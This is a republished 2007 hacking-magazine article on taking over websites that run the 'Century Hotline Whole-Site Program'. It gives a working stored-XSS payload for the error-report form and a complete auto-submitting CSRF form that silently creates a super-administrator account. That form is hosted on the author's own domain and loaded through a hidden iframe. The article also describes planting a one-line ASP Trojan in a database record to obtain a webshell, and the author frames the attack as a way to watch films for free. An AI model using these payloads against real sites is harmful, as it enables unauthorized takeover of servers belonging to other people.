Stepping Beyond Privileges: Exploiting the Century Hotline Whole-Site Program (Perfect Edition) - Vulnerability Alert - Heiba Security Net

2007-08-23T00:00:00
ID MYHACK58:62200716639
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-08-23T00:00:00

Description

Note: this article first appeared in Hacker's Manual. Please credit the source when reprinting.

Cross-site scripting is not a new technique, but it is taken very seriously abroad, and in fact, if the cross-site code is constructed well, it can accomplish a great deal. Recently, while browsing online, I came across a movie website and thought that if I took the site over I could watch movies for free. (Not the best of motives. ^_^) The program it runs is the "Century Hotline Whole-Site Program, Perfect Edition". A Baidu search turned up no published vulnerabilities for it, so I went back and studied it slowly myself.

It is fair to say that this program does a good job of preventing injection. On the cross-site side, however, it seems no homework was done at all. After a careful search I finally found a small weak spot. First, register an ordinary user. Movie websites generally provide a page for reporting errors in a movie, and this one is no exception: on the home page, click any movie, and below it there is a "report error" link that opens a form. Because these error reports are displayed only to administrators, whatever we write there is stored and later rendered in an administrator's browser, so in the report we write <script>alert("cherry find vulnerability")</script>, as shown in Figure 1.

[Figure 1]

Click to submit the report, then go to the backend at Movie Management / Bug Reports and look: the cross-site code executes successfully, as shown in Figure 2.

[Figure 2]

Since script runs there, we can construct something more purposeful. The backend has an "add administrator" function, so first look at how it is implemented. The key code for adding an administrator is as follows:


<form method="post" action="saveuser1.asp" name="form1">
  <table width="396" border="0" cellspacing="1" cellpadding="0">
    <tr bgcolor="#0099FF">
      <td height="25" width="392"><div align="center"><font size="2">Add admin</font></div></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Username <input type="text" name="username" size="20"></font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Password <input type="password" name="newpin" size="20"></font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"><span lang="zh-cn"><font size="2">digits+letters, 10 or more</font></span></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Confirm password <input type="password" name="re_newpin" size="20"></font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"><span lang="zh-cn"><font size="2">digits+letters, 10 or more</font></span></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <p align="center"><span lang="zh-cn"> </span>Set permissions <span lang="zh-cn"> </span>
        <select size="1" name="flag">
          <option selected value="4">==== No management permissions ====</option>
          <option value="3">==== Primary administrator ====</option>
          <option value="2">==== Senior administrator ====</option>
          <option value="1">==== Super administrator ====</option>
        </select>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"></td>
    </tr>
  </table>
  <p><input type="submit" name="Submit" value="OK"></p>
</form>

In fact we only need to change it slightly. The modified code is as follows (the comments mark what was changed):

<form method="post" action="http://127.0.0.1/admin/saveuser1.asp">
  <table width="396" border="0" cellspacing="1" cellpadding="0">
    <tr bgcolor="#0099FF">
      <td height="25" width="392"><div align="center"><font size="2">Add admin</font></div></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Username
          <!-- the administrator name to add -->
          <input type="text" name="username" size="20" value="hacklu119">
        </font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Password
          <!-- the administrator password to add -->
          <input type="password" name="newpin" size="20" value="hack11911">
        </font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"><span lang="zh-cn"><font size="2">digits+letters, 10 or more</font></span></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <div align="center"><font size="2">Confirm password
          <!-- confirm the administrator password -->
          <input type="password" name="re_newpin" size="20" value="hack11911">
        </font></div>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"><span lang="zh-cn"><font size="2">digits+letters, 10 or more</font></span></td>
    </tr>
    <tr>
      <td height="30" style="color: black; border-style: none" width="253">
        <p align="center"><span lang="zh-cn"> </span>Set permissions <span lang="zh-cn"> </span>
        <select size="1" name="flag">
          <!-- the preselected option now carries value 1, i.e. super administrator; note the 1 here -->
          <option selected value="1">==== No management permissions ====</option>
          <option value="3">==== Primary administrator ====</option>
          <option value="2">==== Senior administrator ====</option>
          <option value="1">==== Super administrator ====</option>
        </select>
      </td>
      <td height="30" style="color: black; border-style: none" width="138"></td>
    </tr>
  </table>
  <p><input type="submit" name="Submit" value="OK"></p>
  <p> </p>
  <p align="center">
    <script language="javascript">
      // the script submits the form automatically as soon as the page loads
      document.forms[0].submit();
    </script>
  </p>
</form>


The most important parts are the path in the action attribute and the auto-submit script at the end; the path must match the target site exactly. Save the code above as hacklu.htm and upload it to your own web space. Then, in the error-report field, write the code that pulls it in: <iframe src=http://www.hacklu.net/tu/hacklu.htm width=0 height=0></iframe> (www.hacklu.net is the address of my web space). The error-report field accepts raw HTML, so the iframe is stored and rendered in the administrator's browser when the report is viewed; the hidden page then posts the form with the administrator's own session, and since saveuser1.asp checks nothing beyond that session (the form carries no anti-CSRF token), an account named hacklu119 is added as super administrator when the administrator views the error report. See Figure 3 and Figure 4.

[Figure 3]

[Figure 4]

In fact we could also have constructed a database backup to get a WEBSHELL, or something similar, except that this backend has no "backup database" function, so getting a WEBSHELL takes some work. I first tried uploading an ASP Trojan through the upload in "Add Movie". Another attempt was to capture the upload request and change the extension, but that did not succeed either. Later I noticed by chance that the database file itself is named with an .asp extension, which makes things easy: we only need to write our one-line ASP Trojan into a field in "Add Movie", as shown in Figure 5.

[Figure 5]

Finally, connect with our client to http://127.0.0.1/data/jdzcn.asp, as shown in Figure 6. This works because the database sits under the web root with an .asp extension, so the ASP engine parses it like any other script and executes the tag stored in the record. After the connection succeeds, the file killbase.asp is generated, and with that we have our WEBSHELL. See Figure 7.

[Figures 6 and 7]

But if the database has been renamed, getting the WEBSHELL is not so easy. Finally, everyone is welcome to come to NOHACK/BBS and exchange ideas with me. My ID there is Sakura Prodigal Son.